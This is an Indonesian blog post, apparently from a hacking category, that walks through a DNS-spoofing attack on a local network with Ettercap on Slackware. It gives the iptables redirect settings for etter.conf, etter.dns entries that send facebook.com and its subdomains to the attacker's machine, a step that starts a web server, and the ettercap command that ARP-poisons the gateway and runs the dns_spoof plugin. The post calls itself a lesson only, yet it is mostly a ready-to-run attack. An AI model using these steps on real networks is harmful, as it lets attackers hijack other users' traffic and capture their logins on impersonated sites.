Beranda » Hacking » Dns_Spoof jaringan Local for slackware

Dns_Spoof jaringan Local for slackware

Start here

ok langsung saja praktikumnya ya….
sebelum menyerang kita persiapkan alat perang untuk melakukan penyerangan

donlot ettercap disini

setelah kita install ettercap-NG configurasi pada directory

bash!$ su
password: ****

root@vim-n4n0~# vim /etc/etter.conf

# Linux
#—————

# if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”

klo kita configurasi /etc/etter.conf hilangkan tanda kress or (#)

setelah configurasi iptablesnya kita configurasi lagi pada directory

root@vim-n4n0~# vim /usr/share/ettercap/etter.dns

facebook.com A 192.168.1.30
*.facebook.com A 192.168.1.30
http://www.facebook.com PTR 192.168.1.30

ket : http://www.facebook.com adalah target host kita…
192.168.1.30 adalah ip kita
mari kita lakukan penyerang

sebelum kita menyerang aktifkan HTTPD pda slackware kita

root@vim-n4n0~# /etc/rc.d/rc.httpd start

root@vim-n4n0~# ettercap -i wlan0 -T -q -M arp:remote -P dns_spoof /ip_gateway/ //

ini hanya pelajaran semata bukan untuk kerjain org
GoodLuck

sumber: http://coconutstmik.com | http://makassarhacker.com


Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s